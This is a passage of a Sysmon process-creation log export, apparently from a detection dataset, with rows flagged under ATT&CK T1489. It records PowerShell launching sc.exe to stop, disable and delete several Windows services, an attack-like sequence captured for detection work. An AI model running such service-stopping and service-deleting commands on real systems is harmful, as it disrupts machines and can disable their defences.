12:52:35.170"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010ca993000}"",""processId"":""8096"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SxS Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.414",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.140 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00101b983000} +ProcessId: 4544 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.143899000Z"",""eventRecordID"":""3811"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.140\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00101b983000}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:35.140"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00101b983000}"",""processId"":""4544"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.348",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.090 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010c5953000} +ProcessId: 3496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.093465300Z"",""eventRecordID"":""3808"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.090\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010c5953000}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.090"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010c5953000}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.296",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.050 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00108d933000} +ProcessId: 5944 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: 
""C:\Windows\system32\sc.exe"" Delete RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.053341500Z"",""eventRecordID"":""3806"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.050\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00108d933000}\r\nProcessId: 5944\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.050"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00108d933000}"",""processId"":""5944"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.275",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.036 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010bd923000} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.039946200Z"",""eventRecordID"":""3805"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.036\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010bd923000}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.036"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010bd923000}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.200",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:52:34.986 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-0010d48f3000} +ProcessId: 6016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.993340900Z"",""eventRecordID"":""3802"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.986\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-0010d48f3000}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.986"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-0010d48f3000}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.108",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:34.923 +ProcessGuid: {df9fc3d3-b412-5ecf-0000-00103e8d3000} +ProcessId: 1012 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.925813300Z"",""eventRecordID"":""3799"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:34.923\r\nProcessGuid: {df9fc3d3-b412-5ecf-0000-00103e8d3000}\r\nProcessId: 1012\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:34.923"",""processGuid"":""{df9fc3d3-b412-5ecf-0000-00103e8d3000}"",""processId"":""1012"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
